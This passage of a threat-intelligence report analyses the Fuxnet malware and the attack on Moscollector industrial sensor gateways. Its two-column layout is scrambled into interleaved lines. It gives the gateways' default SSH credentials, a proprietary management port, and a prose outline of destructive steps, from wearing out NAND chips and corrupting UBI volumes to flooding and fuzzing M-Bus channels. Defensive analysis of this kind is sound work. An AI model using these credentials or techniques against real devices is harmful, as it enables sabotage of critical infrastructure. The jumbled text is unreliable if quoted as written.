various environmental monitoring systems, including those used
• Emergency Response Delays: If the claims about in fire alarms, gas monitoring, and lighting controls.
accessing the 112-emergency service number are
accurate, this could lead to delays in emergency The sensors are designed to collect physical data such as
response, affecting public safety. temperature and transmit this information through a serial or bus
connection, specifically an RS485/Meter-Bus, to a gateway.
• Data Exfiltration: Although not explicitly mentioned in These gateways act as transmission units, enabling the telemetry
the context of Fuxnet, the malware's ability to data to be sent over the internet to a centralized monitoring
compromise network systems could potentially lead to system, which provides operators with visibility and control
data breaches and the exfiltration of sensitive over the systems.
information.
The RS485 communication standard, as mentioned in the
• Loss of Public Confidence: Cyberattacks on critical attack details, is a widely adopted protocol for industrial control
infrastructure can lead to a loss of public confidence in systems due to its reliability and capability for long-distance
the affected services and the entities responsible for their communication. It allows for multiple devices to communicate
security. over a single bus system, which is essential for the centralized
monitoring of various sensors and controllers.
C. Moscollector Attack
The attack, which began its initial compromise in June 2023, The Meter-Bus (M-Bus) is another communication protocol
was methodically orchestrated to undermine the industrial used for the collection and transmission of consumption data,
sensors and monitoring infrastructure. Recently, the group made typically for utilities like electricity, gas, water, or heat. When
public their activities and the stolen information on the ruexfil combined with RS485, it forms a robust network for industrial
website, detailing the extent and impact of their cyber offensive. sensors to communicate and relay information to central
The compromise of this system could potentially disrupt systems.
emergency response capabilities, affecting the safety and By compromising the gateways, the attackers could
security of the populace. potentially disrupt the telemetry and control of the sensors,
leading to a loss of operational visibility and potentially causing
1) Bricking of Critical Infrastructure Sensors and Controllers
chaos in the systems that rely on this data.
Group alleges to have hacked and bricked sensors and
controllers within critical infrastructure sectors, including 1) Leaked Information
airports, subways, and gas pipelines. This action, if true, could The information from the JSON files was corroborated by
have disabled essential monitoring and control systems, leading two YouTube videos released by the attackers, showing the
to significant disruptions in public services and safety. deployment of the Fuxnet malware. The devices listed in the
videos matched the gateways from the JSON file, confirming
2) Network Appliance Disruption
that the TMSB/MPSB gateways were the primary targets of the
The group asserts that they have disabled network appliances
Fuxnet malware.
such as routers and firewalls. This would have a cascading effect
on the network's integrity, potentially isolating various segments
and hindering communication across the infrastructure.

65
 Read more: Boosty | Sponsr | TG

The JSON data included device types and names, IP The attackers exploited a significant security lapse: the use
addresses, communication ports, and location data. The types of of default credentials (Username: sbk, Password: temppwd) to
devices listed in the JSON file were: access the gateways via SSH. This vulnerability provided an
easy entry point for the attackers to compromise the devices.
• MPSB (sensor gateway): 424 Devices
The attackers also leaked diagrams and screenshots from the
• TMSB (sensor gateway+modem): 93 Devices sensor management UI, showcasing the network topology.
• IBZ (3g router): 93 Devices In addition to the TMSB module with built-in 3/4G
• Windows 10 (workstation): 9 Devices capabilities, the attackers mentioned the use of iRZ RL22w
routers. These routers, which use OpenWRT, were likely
• Windows 7 (workstation): 1 Device employed as internet-gateway devices to connect the sensors to
the internet via 3G.
• Windows XP (workstation): 1 Device
The attackers reportedly used the SSH service to connect to
This list indicates that the attack was focused on the sensor these IoT devices and tunnel to internal devices, likely after
gateways rather than the end sensors themselves. The gateways obtaining root passwords. Shodan and Censys searches revealed
serve as the communication hubs for potentially numerous that thousands of iRZ routers are exposed on the internet, with
sensors connected via a serial bus such as RS485/Meter-Bus. around 4,100 devices directly exposing their services and about
The leaked data from the attackers, including screenshots 500 enabling Telnet.
and JSON exports, revealed two specific types of gateways
3) Sensor Management and Commissioning Software:
compromised during the attack:
The software suite is a critical tool used by engineers to
• MPSB Gateway: This gateway is engineered for manage and configure sensors within an industrial or
information exchange with external devices through infrastructure setting. This software connects to devices using a
multiple interfaces. It supports Ethernet and serial proprietary protocol that runs over TCP port 4321. The interface
communication protocols, including CAN, RS-232, and allows engineers to access and modify the settings of sensors,
RS-485. The MPSB gateway is a crucial component for including their input/output configurations, nodes, and readings.
integrating various sensor inputs into a cohesive This capability is essential for the proper setup and maintenance
monitoring system. of sensor networks, ensuring they operate efficiently and
accurately within their designated environments.
• TMSB Gateway: Similar in function to the MPSB, the
TMSB gateway includes a built-in 3/4G modem, which Features of software:
allows it to transmit data directly over the internet to a • Device Connection: Utilizes a proprietary protocol over
remote system without the need for additional routing TCP/4321 to establish a secure connection with sensors.
equipment.
• Configuration Capabilities: Enables the configuration
The cyberattack targeted a critical part of the sensor
of sensor settings, including adjustments to their
ecosystem: the orchestrator/gateway devices, specifically the
operational parameters and the management of data they
MPSB and TMSB gateways. These devices are essential for
collect.
reading and controlling basic input/output sensors and
transmitting the data to a global monitoring system for • User Interface: The interface provides a straightforward
centralized oversight. and intuitive means for engineers to interact with
The attack exploited the communication pathways between connected sensors, facilitating ease of use and efficiency
the sensors and the global monitoring system. The typical data in sensor management tasks.
transmission scenarios targeted were: 4) Technical Impact
• For MPSB Gateway: Sensor —--- MBus/RS485 → The sensor monitoring system is another significant
component of the infrastructure targeted in the. This system is
MPSB + IoT Router — ---Internet → Monitoring
designed to aggregate and display telemetry and status reports
system. In this scenario, the sensor data is transmitted from a network of sensors. It plays a vital role in operational
via MBus/RS485 to the MPSB gateway, which then oversight by allowing system operators to receive real-time
passes the data through an IoT router to the internet, and alerts, log data, and manage sensors remotely.
finally to the monitoring system.
According to the claims made by group, they successfully
• For TMSB Gateway: Sensor —--- MBus/RS485 → compromised this monitoring system. By doing so, they gained
TMSB (3g/4g modem) —---Internet → Monitoring access to a comprehensive list of managed sensors and were able
system. Here, the sensor data is sent via MBus/RS485 to correlate these sensors geographically on a map. This breach
directly to the TMSB gateway, which uses its built-in not only exposed sensitive operational data but also potentially
modem to transmit the data over the internet to the allowed the attackers to manipulate sensor outputs and disrupt
monitoring system. normal operations. In terms of visualization and control:
2) Security Lapses and Attack Methodology

66
 Read more: Boosty | Sponsr | TG

• Geolocation Features: The monitoring system includes memory has a limited number of write cycles, and the malware
geolocation markings, which help in visualizing the exploited this limitation to cause the chips to malfunction and
physical locations of sensors across the network. This become inoperable.
feature is particularly useful for large-scale operations
where sensors are dispersed over extensive areas. 4) Destroying UBI Volume
To prevent the sensor from rebooting, the malware rewrote
• Facility-Specific Monitoring: Screenshots from the the UBI volume. It used the IOCTL interface UBI_IOCVOLUP
system show that it is capable of focusing on specific to mislead the kernel into expecting a certain number of bytes to
facilities, such as hospitals, indicating its use in critical be written, but then wrote fewer bytes, causing the device to
infrastructure settings where precise monitoring is hang indefinitely. The malware then overwrote the UBI volume
necessary for safety and operational integrity. with junk data, destabilizing the filesystem.
E. Analyzing the Fuxnet Malware 5) Denial-Of-Service on Monitoring
The malware was designed to target sensor gateways, which The final step in the malware's process was to disrupt the
are crucial components in the infrastructure of monitoring and communication between the sensor gateways and the sensors
control systems. The logical processes identified in the behavior themselves. The malware flooded the RS485/Meter-Bus serial
of the Fuxnet malware include several steps aimed at causing channels with random data, overwhelming the bus and the
irreversible damage to the targeted devices. sensors. This action prevented the sensors and gateways from
transmitting and receiving data, rendering the data acquisition
• The Fuxnet malware was specifically designed to target process useless.
and destroy sensor gateways, not the end-sensors.
6) The M-Bus Fuzzing Strategy
• The malware's actions included locking devices, This strategy involved the constant sending of M-Bus frames
destroying filesystems, NAND chips, and UBI volumes, over the serial channel, likely RS485, aiming to overwhelm and
and flooding communication channels. potentially damage the sensors connected to this network. The
• The attack was likely facilitated by exploiting default attack involved two main tactics: flooding the M-Bus channel
credentials and vulnerabilities in remote-access with an excessive number of frames and employing fuzzing
protocols. techniques to potentially exploit vulnerabilities within the
sensors.
• Despite claims of compromising 87,000 devices, the
actual impact appears to be limited to the sensor 7) M-Bus Flooding
gateways, with the end-sensors likely remaining intact. The attackers aimed to disable sensor communication by
overwhelming the M-Bus channel with a high volume of frames.
1) Deployment Script This tactic was likely intended to either directly damage the
The attack began with the creation of a deployment script. sensors through overload or to create conditions conducive to
The attackers compiled a comprehensive list of the IP addresses exploiting vulnerabilities. The fuzzing approach was more
of the sensor gateways they intended to target, along with nuanced and targeted. The group implemented two fuzzing
detailed descriptions of each sensor's physical location. The strategies within their malware:
malware was then distributed to each target, likely using remote-
access protocols such as SSH or the proprietary SBK sensor • Random Fuzzing: This method involved generating
protocol over TCP port 4321. random bytes and sending them over the M-Bus,
appending a simple M-Bus CRC to ensure the frames
2) Locking Up Devices and Destroying the Filesystem were not dropped by the sensors. The goal was to cover
Upon execution on the target device, the Fuxnet malware the entire range of possible M-Bus payloads, valid or
initiated a process to lock out the device. It remounted the not, in hopes of triggering sensor malfunctions or
filesystem with write access and proceeded to delete critical files vulnerabilities.
and directories. It also shut down remote access services,
• Structured Fuzzing: this approach attempted to
including SSH, HTTP, telnet, and SNMP, effectively preventing
generate valid M-Bus frames, only randomizing specific
any remote restoration efforts. Additionally, the malware
fields within the protocol. By adhering more closely to
deleted the device's routing table, crippling its communication
the M-Bus structure, the malware increased the
capabilities.
likelihood of the sensor treating the packet as valid and
3) Destroying NAND Chips parsing it fully, thereby increasing the chances of
The malware's next step was to physically destroy the triggering a vulnerability.
NAND memory chips within the devices. It performed a bit-flip
operation on sections of the SSD NAND chip, repeatedly writing
and rewriting memory until the chip was corrupted. NAND

67
Read more: Boosty | Sponsr | TG

68